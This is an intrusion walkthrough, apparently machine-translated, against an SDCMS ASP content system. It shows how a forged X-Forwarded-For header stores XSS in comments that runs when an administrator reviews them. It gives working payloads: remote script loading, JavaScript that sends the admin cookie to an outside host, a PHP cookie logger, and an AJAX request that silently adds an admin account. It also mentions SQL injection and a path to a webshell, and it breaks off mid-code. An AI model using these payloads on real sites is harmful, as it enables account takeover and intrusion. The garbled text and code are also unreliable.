Author: Amxking
Vulnerability Analysis:
Let's take a look at the following code:
(Note: This method can be used only when the Administrator permits comments. However, the Administrator generally allows comments)
In/plug/comment. asp
Sub save_comment
......
Username = sdcms_f.HTMLEncode (username)
Content = sdcms_f.contentEncode (content)
Ip = sdcms_f.getip 'Please refer to here and get your IP address here.
Set rs = server. CreateObject ("adodb. recordset ")
SQL = "select username, content, ip, infoid, ispass from sd_comment"
Rs. open SQL, conn, 1, 3
Rs. addnew
Rs (0) = left (username, 10)
Rs (1) = content
Rs (2) = ip // No filtering, directly inserted into the database.
Rs (3) = id
If sdcms_comment_ispass = 1 then
Msg_contents = ", please wait for review"
Rs (4) = 0
Else
Rs (4) = 1
End if
Rs. update
......
End sub
Let's take a look at the implementation of getip,
In/inc/function. asp
Public Function getip
Ip = request. ServerVariables ("HTTP_X_FORWARDED_FOR ")
If ip = "" then ip = Request. ServerVariables ("REMOTE_ADDR ")
Getip = ip
End function
We all know that the problem exists. The author uses the "HTTP_X_FORWARDED_FOR" field to obtain the IP value. We know that this field can be forged in data packets.
We can forge data packets and change the value of "HTTP_X_FORWARDED_FOR" to a single-statement trojan for submission. In this way, a single-statement Trojan is directly inserted into the database. if we know the database location and the database suffix is asp, we can directly use it.
Unfortunately, the name of the CMS database is unknown. During installation, 12 random characters are generated by the following code, and the suffix is still mdb. Therefore, we need to insert a sentence, it cannot be used either.
/Install/index. asp
Function get_something
Randomize
Do While Len (pass) <12 random password digits
Num1 = CStr (Chr (57-48) * rnd + 48) 0 ~ 9
Num2 = CStr (Chr (90-65) * rnd + 65) ~ Z
Num3 = CStr (Chr (122-97) * rnd + 97) ~ Z
Pass = pass & num1 & num2 & num3
Loop
Get_something = pass
End function
We want to use another method for intrusion.
See the following code:
/Admin/sdcms_comment.asp
Sub main
Echo "<form name =" "add" "action = ""? "" Method = "" post "" onSubmit = "" return confirm (Are you sure you want to perform the selected operation ?); "">"
Page = request. querystring ("page ")
If page = "" or not isnumeric (page) then
Page = 1
End if
Pages = 20
Set rs = server. CreateObject ("adodb. recordset ")
If request ("classid") <> 0 then tj = "where infoid =" & request ("classid") & "'has an injection vulnerability, although classid = sdcms is used above. requestint (classid) to obtain its integer, but when it is stored in SQL, it does not use classid for query, but directly uses request ("classid") for query, when preventing injection, the author does not filter its values, so it can be injected. However, the premise of this injection is that it has the Administrator permission. Therefore, we will not discuss it.
SQL = "select id, username ,"
If Is_ SQL = 0 then
SQL = SQL & "(iif (ispass = 1, reviewed, not reviewed ))"
Else
SQL = SQL & "(case ispass when 1 then audited else unaudited end )"
End if
SQL = SQL & ", ip, adddate, content, ispass, infoid from" & sd_table & "& tj &" order by ispass, id desc"
'The author uses SQL statements to directly find the IP address value and uses the following code to display it on the page without any filtering.
<Td class = "title_bg" style = "text-align: left"> <span style = "float: right"> <% if rs (6) = 0 then %> <a href = "? Action = pass & id = <% = rs (0) %> & t = 1 & classid = <% = classid %> "> Verification passed </a> <% else %> <a href = "? Action = pass & id = <% = rs (0) %> & t = 0 & classid = <% = classid %> "> cancel verification </a> <% end if %> <a href = "? Action = del & id = <% = rs (0) %> & classid = <% = classid %> "onclick = return confirm (" are you sure you want to delete it? Cannot be recovered! ");> Delete </a> </span> <input name =" id "type =" checkbox "onClick =" unselectall () "value =" <% = rs (0) %> "> <% = rs (1) %> published on: <% = rs (4) %> IP: <% = rs (3) %> </td>
We take into account xss attacks and execute malicious JavaScript code when the Administrator checks and reviews the comments.
The concept of Xss is not detailed here, we assign the value of "HTTP_X_FORWARDED_FOR" to <script src = http://www.xuehi.com/test.js> </script> (we write malicious js to test. js)
Then submit. The method submitted here is no longer cumbersome. You can use nc to capture packets and submit it. You can also find a ready-made tool for submission. Of course, you can also write your own program for submission.
Note that the default ip address field of the recipient is 50 characters long, so we need to control this length.
For this CMS, the cookie consists of 12 characters customized by the author, the administrator username, And the md5 password,
Therefore, when we get the cookie, we basically get the background permission.
The following describes how to implement test. js,
If
Alert (document. cookie)
In this way, the author will pop up his cookie during review. of course we won't use it that way. We need to send cookies to remote servers. the following code should not be unfamiliar.
Test. js content:
Var img = new Image ();
Img. src = "http://www.xuehi.com/test.php? Cookie = "+ document. cookie;
The content of Test. php is as follows:
<? Php <br/> Fputs(fopen('a.txt ', 'a +'), $ _ GET ['cookies']. '//'); <br/> <br/>?> </P> <p> in this example, the Administrator generates a.txt on our server, which contains the Administrator's cookie. <br/> if we have a cookie, we have an administrator identity. <br/> go to the background and modify the cookie. <br/> Of course, you can also use ajax to allow the Administrator to add an account. The method is as follows: <br/> function getXHR () {<br/> var xhr = null <br/> if (window. XMLHttpRequest) {<br/> xhr = new XMLHttpRequest (); <br/>} else if (window. createRequest) {<br/> xhr = window. createReq Uest (); <br/>} else if (window. activeXObject) {<br/> try {<br/> xhr = new ActiveXObject (Msxml2.XMLHTTP ); <br/>} catch (E) {<br/> try {<br/> xhr = new ActiveXObject (Microsoft. XMLHTTP); <br/>} catch (E) {}< br/> <br/>}< br/> <br/> return xhr; <br/> <br/>}< br/> <br/> var ajax = getXHR (); <br/> ajax. open (POST,/admin/sdcms_admin.as P?? Action = save & act = add, false); <br/> ajax. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); <br/> ajax. send ("t0 = test & t1 = test & t2 = 1 ");
After the Administrator browses the comments, an account is automatically added.
I mentioned this in my previous articles, so I will not elaborate on it.
Next we will show you how to use shell. Let's take a look at the code of the configuration written in the background:
In/admin/sdcms_set.asp
Set fso = server. CreateObject ("scripting. filesystemobject ")
Set info = fso. CreateTextFile (Server. mappath ("../inc/const. asp"), true)
Info. write "<" & "%" & vbcrlf
......
Info. write "%" & ">"
Info. close
Set info = nothing
Set fso = nothing
The author writes the configuration file to/inc/const. asp,
In
Sub save
T0 = clear_bad (trim (request ("t0 ")))
T1 = clear_bad (trim (request ("t1 ")))
T2 = clear_bad (trim (request ("t2 ")))
T3 = clear_bad (trim (request ("t3 ")))
T4 = clear_bad (trim (request ("t4 ")))
T5 = clear_bad (trim (request ("t5 ")))
T6 = clear_bad (trim (request ("t6 ")))
T7 = clear_bad (trim (request ("t7 ")))
T8 = clear_bad (trim (request ("t8 ")))
T9 = clear_bad (trim (request ("t9 ")))
T10 = clear_bad (trim (request ("t10 ")))
T11 = clear_bad (trim (request ("t11 ")))
T12 = clear_bad (trim (request ("t12 ")))
T13 = trim (requ